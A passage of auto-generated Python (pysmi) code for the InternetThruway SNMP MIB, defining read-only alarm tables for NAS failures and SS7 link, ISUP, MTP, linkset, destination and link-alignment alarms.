if mibBuilder.loadTexts: nasIndex.setDescription("Identifies the n'th position in the table.")
nasName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasName.setStatus('mandatory')
if mibBuilder.loadTexts: nasName.setDescription('The NAS Name')
nasKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasKey.setStatus('mandatory')
if mibBuilder.loadTexts: nasKey.setDescription('Unique identifier for the NAS Failure alarm ')
nasAlarmTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 4), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAlarmTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: nasAlarmTimeStamp.setDescription('Indicates the time of the NAS Alarm.')
nasIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 5), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: nasIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
nasCmplxName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCmplxName.setStatus('mandatory')
if mibBuilder.loadTexts: nasCmplxName.setDescription(' The complex which this alarm is raised against.')
ss7LinkFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12), )
if mibBuilder.loadTexts: ss7LinkFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkFailureAlarmTable.setDescription('The SS7LinkFailureAlarmTable contains alarms for SS7 link failures.')
ss7LinkFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1), ).setIndexNames((0, "InternetThruway-MIB", "lfIndex"))
if mibBuilder.loadTexts: ss7LinkFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 Link Failure Alarm Table. A row can be uniquely identified with the row index.')
lfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 1), Integer32())
if mibBuilder.loadTexts: lfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lfIndex.setDescription('Identifies the row number in the table.')
lfKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfKey.setStatus('mandatory')
if mibBuilder.loadTexts: lfKey.setDescription('Unique identifier for the alarm.')
lfIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: lfIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
lfLinkCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfLinkCode.setStatus('mandatory')
if mibBuilder.loadTexts: lfLinkCode.setDescription('This object identifies the signalling link code (SLC) of the failed link.')
lfTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lfTimeStamp.setDescription('Indicates the time of the alarm.')
lfName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfName.setStatus('mandatory')
if mibBuilder.loadTexts: lfName.setDescription('Indicates the configured name for the machine which sent the alarm.')
lfCardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfCardId.setStatus('mandatory')
if mibBuilder.loadTexts: lfCardId.setDescription('This object identifies the device that hosts the failed link. It provides a physical description of the device, as well as its slot number.')
lfLinkSet = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfLinkSet.setStatus('mandatory')
if mibBuilder.loadTexts: lfLinkSet.setDescription('This object identifies the linkset associated with the link via its adjacent point code.')
ss7LinkCongestionAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13), )
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTable.setDescription('The SS7LinkCongestionAlarmTable contains alarms to indicate congestion on an SS7 link.')
ss7LinkCongestionAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1), ).setIndexNames((0, "InternetThruway-MIB", "lcIndex"))
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTableEntry.setDescription('This object defines a row within the SS7 Link Congestion Alarm Table. A row can be uniquely identified with the row index.')
lcIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 1), Integer32())
if mibBuilder.loadTexts: lcIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lcIndex.setDescription('Identifies the row number in the table.')
lcKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcKey.setStatus('mandatory')
if mibBuilder.loadTexts: lcKey.setDescription('Unique identifier for the alarm.')
lcIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: lcIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
lcLinkCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcLinkCode.setStatus('mandatory')
if mibBuilder.loadTexts: lcLinkCode.setDescription('This object identifies the signalling link code (SLC) of the affected link.')
lcTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lcTimeStamp.setDescription('Indicates the time of the alarm.')
lcName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcName.setStatus('mandatory')
if mibBuilder.loadTexts: lcName.setDescription('Indicates the configured name for the machine which sent the alarm.')
lcCardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcCardId.setStatus('mandatory')
if mibBuilder.loadTexts: lcCardId.setDescription('This object identifies the device that hosts the failed link. It provides a physical description of the device, as well as its slot number.')
lcLinkSet = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcLinkSet.setStatus('mandatory')
if mibBuilder.loadTexts: lcLinkSet.setDescription('This object identifies the linkset associated with the link via its adjacent point code.')
ss7ISUPFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14), )
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTable.setDescription('The SS7ISUPFailureAlarmTable contains alarms for SS7 ISUP protocol stack failures.')
ss7ISUPFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1), ).setIndexNames((0, "InternetThruway-MIB", "ifIndex"))
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 ISUP Failure Alarm Table. A row can be uniquely identified with the row index.')
ifIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 1), Integer32())
if mibBuilder.loadTexts: ifIndex.setStatus('mandatory')
if mibBuilder.loadTexts: ifIndex.setDescription('Identifies the row number in the table.')
ifKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifKey.setStatus('mandatory')
if mibBuilder.loadTexts: ifKey.setDescription('Unique identifier for the alarm.')
ifIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: ifIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
ifTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 4), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: ifTimeStamp.setDescription('Indicates the time of the alarm.')
ifName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifName.setStatus('mandatory')
if mibBuilder.loadTexts: ifName.setDescription('Indicates the configured name for the machine which sent the alarm.')
ss7ISUPCongestionAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15), )
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTable.setDescription('The SS7ISUPCongestionAlarmTable contains alarms to indicate congestion with an ISUP protocol stack.')
ss7ISUPCongestionAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1), ).setIndexNames((0, "InternetThruway-MIB", "icIndex"))
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTableEntry.setDescription('This object defines a row within the SS7 ISUP Congestion Alarm Table. A row can be uniquely identified with the row index.')
icIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 1), Integer32())
if mibBuilder.loadTexts: icIndex.setStatus('mandatory')
if mibBuilder.loadTexts: icIndex.setDescription('Identifies the row number in the table.')
icKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icKey.setStatus('mandatory')
if mibBuilder.loadTexts: icKey.setDescription('Unique identifier for the alarm.')
icIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: icIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
icCongestionLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icCongestionLevel.setStatus('mandatory')
if mibBuilder.loadTexts: icCongestionLevel.setDescription('This object indicates the congestion level with an ISUP protocol stack. Possible congestion levels are: (0) Normal (1) Congestion ')
icTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: icTimeStamp.setDescription('Indicates the time of the alarm.')
icName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icName.setStatus('mandatory')
if mibBuilder.loadTexts: icName.setDescription('Indicates the configured name for the machine which sent the alarm.')
ss7MTP3CongestionAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16), )
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTable.setDescription('The SS7MTP3CongestionAlarmTable contains alarms to indicate congestion on an MTP3 link.')
ss7MTP3CongestionAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1), ).setIndexNames((0, "InternetThruway-MIB", "mtp3Index"))
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTableEntry.setDescription('This object defines a row within the SS7 MTP3 Congestion Alarm Table. A row can be uniquely identified with the row index.')
mtp3Index = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 1), Integer32())
if mibBuilder.loadTexts: mtp3Index.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3Index.setDescription('Identifies the row number in the table.')
mtp3Key = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3Key.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3Key.setDescription('Unique identifier for the alarm.')
mtp3IPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3IPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3IPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
mtp3CongestionLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3CongestionLevel.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3CongestionLevel.setDescription('This object indicates the congestion level on a problem SS7 Link. Possible congestion values are: (0) Normal (1) Minor (2) Major (3) Critical ')
mtp3TimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3TimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3TimeStamp.setDescription('Indicates the time of the alarm.')
mtp3Name = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3Name.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3Name.setDescription('Represents the configured name of the machine which sent the alarm.')
ss7MTP2TrunkFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17), )
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTable.setDescription('The SS7MTP2TrunkFailureAlarmTable contains alarms to indicate MTP2 trunk failures.')
ss7MTP2TrunkFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1), ).setIndexNames((0, "InternetThruway-MIB", "mtp2Index"))
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 MTP2 Failure Alarm Table. A row can be uniquely identified with the row index.')
class MTP2AlarmConditionType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("fasError", 1), ("carrierLost", 2), ("synchroLost", 3), ("aisRcv", 4), ("remoteAlarmRcv", 5), ("tooHighBer", 6))
mtp2Index = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 1), Integer32())
if mibBuilder.loadTexts: mtp2Index.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2Index.setDescription('Identifies the row number in the table.')
mtp2Key = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2Key.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2Key.setDescription('Unique identifier for the alarm.')
mtp2IPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2IPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2IPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
mtp2Name = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2Name.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2Name.setDescription('This object identifies the configured name of the machine which sent the alarm.')
mtp2CardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2CardId.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2CardId.setDescription('This object indicates the device upon which the affected trunk is hosted. The string contains a physical description of the device, as well as its slot number.')
mtp2AlarmCondition = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 6), MTP2AlarmConditionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2AlarmCondition.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2AlarmCondition.setDescription('This object indicates which of the possible alarm conditions is in effect. Alarms are not nested: a new alarm is only reported if there is no current alarm condition.')
mtp2TimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 7), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2TimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2TimeStamp.setDescription('Indicates the time of the alarm.')
ss7LinksetFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18), )
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTable.setDescription('The SS7LinksetFailureAlarmTable contains alarms to indicate failure on an CSG linkset.')
ss7LinksetFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1), ).setIndexNames((0, "InternetThruway-MIB", "lsFailureIndex"))
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 Linkset Failure Alarm Table. A row can be uniquely identified with the row index.')
lsFailureIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 1), Integer32())
if mibBuilder.loadTexts: lsFailureIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureIndex.setDescription('Identifies the row number in the table.')
lsFailureKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureKey.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureKey.setDescription('Unique identifier for the alarm.')
lsFailureIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
lsFailureName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureName.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureName.setDescription('Represents the configured name of the machine which sent the alarm.')
lsFailurePointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailurePointcode.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailurePointcode.setDescription('This object indicates the pointcode associated with the linkset.')
lsFailureTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureTimeStamp.setDescription('Indicates the time of the alarm.')
ss7DestinationInaccessibleAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19), )
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTable.setDescription('The SS7DestinationAccessAlarmTable contains alarms which indicate inaccessible signalling destinations.')
ss7DestinationInaccessibleAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1), ).setIndexNames((0, "InternetThruway-MIB", "destInaccessIndex"))
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTableEntry.setDescription('This object defines a row within the SS7 Destination Inaccessible Alarm Table. A row can be uniquely identified with the row index.')
destInaccessIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 1), Integer32())
if mibBuilder.loadTexts: destInaccessIndex.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessIndex.setDescription('Identifies the row number in the table.')
destInaccessKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessKey.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessKey.setDescription('Unique identifier for the alarm.')
destInaccessIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
destInaccessName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessName.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessName.setDescription('Represents the configured name of the machine which sent the alarm.')
destInaccessPointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessPointcode.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessPointcode.setDescription('This object indicates the point code of the inaccessible signalling destination.')
destInaccessTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessTimeStamp.setDescription('Indicates the time of the alarm.')
ss7DestinationCongestedAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20), )
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTable.setDescription('The SS7DestinationCongestedAlarmTable contains alarms to indicate congestion on the given destination.')
ss7DestinationCongestedAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1), ).setIndexNames((0, "InternetThruway-MIB", "destCongestIndex"))
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTableEntry.setDescription('This object defines a row within the SS7 Destination Congestion Table. A row can be uniquely identified with the row index.')
destCongestIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 1), Integer32())
if mibBuilder.loadTexts: destCongestIndex.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestIndex.setDescription('Identifies the row number in the table.')
destCongestKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestKey.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestKey.setDescription('Unique identifier for the alarm.')
destCongestIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
destCongestName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestName.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestName.setDescription('Represents the configured name of the machine which sent the alarm.')
destCongestPointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestPointcode.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestPointcode.setDescription('This object indicates the pointcode of the congested destination.')
destCongestCongestionLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestCongestionLevel.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestCongestionLevel.setDescription('This object indicates the congestion level on a problem SS7 pointcode. Possible congestion values are: (0) Normal (1) Minor (2) Major (3) Critical ')
destCongestTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 7), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestTimeStamp.setDescription('Indicates the time of the alarm.')
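# --- SS7 Link Alignment alarm table -------------------------------------------
# One row per signalling link that has failed to align, identified by its
# signalling link code (SLC), hosting card and linkset; rows are indexed by
# linkAlignIndex.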
ss7LinkAlignmentAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21), )
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTable.setDescription('The SS7LinkAlignmentAlarmTable contains alarms which indicate SS7 signalling link alignment failures.')
ss7LinkAlignmentAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1), ).setIndexNames((0, "InternetThruway-MIB", "linkAlignIndex"))
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTableEntry.setDescription('This object defines a row within the SS7 Link Alignment Alarm Table. A row can be uniquely identified with the row index.')
linkAlignIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 1), Integer32())
if mibBuilder.loadTexts: linkAlignIndex.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignIndex.setDescription('Identifies the row number in the table.')
linkAlignKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignKey.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignKey.setDescription('Unique identifier for the alarm.')
linkAlignIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
linkAlignName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignName.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignName.setDescription('Represents the configured name of the machine which sent the alarm.')
linkAlignLinkCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignLinkCode.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignLinkCode.setDescription('This object identifies the signalling link code (SLC) of the affected link.')
linkAlignTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignTimeStamp.setStatus('mandatory')
